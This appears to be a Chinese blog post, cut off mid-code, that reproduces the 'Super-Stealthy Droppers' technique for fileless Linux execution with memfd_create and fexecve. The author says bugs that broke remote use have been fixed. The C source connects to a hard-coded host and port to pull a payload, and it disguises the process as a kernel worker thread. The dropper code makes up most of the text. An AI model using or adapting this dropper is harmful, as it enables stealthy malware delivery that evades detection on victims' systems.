linux无文件进程注入
本文是对 Super-Stealthy Droppers 的复现,测试发现代码有些 bug,在远程利用时会出问题,稍作完善了下。 memfd_create + fexecve memfd_create 需要 kernel 3.17 以上(注意:下面手写的 __NR_memfd_create = 319 是 x86_64 的系统调用号,其他架构并不相同;glibc 2.27 起 <sys/mman.h> 已直接提供 memfd_create() 封装),fexecve 需要 glibc 2.3.2 以上(glibc 2.27 之前 fexecve 是通过打开 /proc/self/fd/N 实现的,目标机上必须挂载 /proc 才能用;2.27 起在 kernel ≥ 3.19 上改用 execveat 系统调用) #include <stdio.h> #include <stdlib.h> #include <sys/syscall.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <arpa/inet.h> #define __NR_memfd_create 319 #define MFD_CLOEXEC 1 static inline int memfd_create( const char *name, unsigned int flags) { return syscall(__NR_memfd_create, name, flags); } extern char **environ; int main ( int argc, char **argv) { int fd, s; unsigned long addr = 0x0100007f11110002 ; char *args[ 2 ]= { "[kworker/u!0]" , NULL}; char buf[ 1024 ]; int num; // Connect if ((s = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0 ) exit ( 1 ); if (connect (s, (struc